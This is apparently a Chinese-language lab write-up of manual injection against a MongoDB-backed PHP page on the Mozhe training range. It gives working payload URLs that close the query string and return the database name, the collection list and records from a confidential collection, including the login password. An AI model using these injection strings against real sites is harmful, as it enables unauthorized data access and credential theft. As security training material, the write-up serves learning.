SQL手工注入MongoDB数据库

MongoDB语法跟其它数据库有所区别
具体参考:https://www.runoob.com/mongodb/mongodb-query.html

环境

墨者靶场 SQL手工注入漏洞测试(MongoDB数据库)

SQL手工注入MongoDB数据库

思路

题目代码给出了列名

如果语句这样写/new_list.php?id=1 order by 2

代码接收db.notice.findOne({'id':'1 order by 2'}); return data; 并没有闭合,注入语句无法生效

想办法闭合语句,查看所有集合

SQL手工注入MongoDB数据库

注入语句

都是内置函数,注入语句改列名就行

构造简单的链接测回显:/new_list.php?id=1'}); return ({title:1,content:'2

SQL手工注入MongoDB数据库

爆库: /new_list.php?id=1'}); return ({title:tojson(db),content:'1

SQL手工注入MongoDB数据库

爆表:/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()),content:'1

db.getCollectionNames()返回的是数组,需要用tojson转换为字符串,并且mongodb函数区分大小写

SQL手工注入MongoDB数据库
爆字段:/new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1

db.Authority_confidential是当前用的表,find函数用于查询,0是第一条数据,墨者第二条数据才是登录密码,故而把find()[0]改为find()[1]

SQL手工注入MongoDB数据库

上一篇:【Maxwell】01 安装及入门


下一篇:Java JDBC H2 内存数据库示例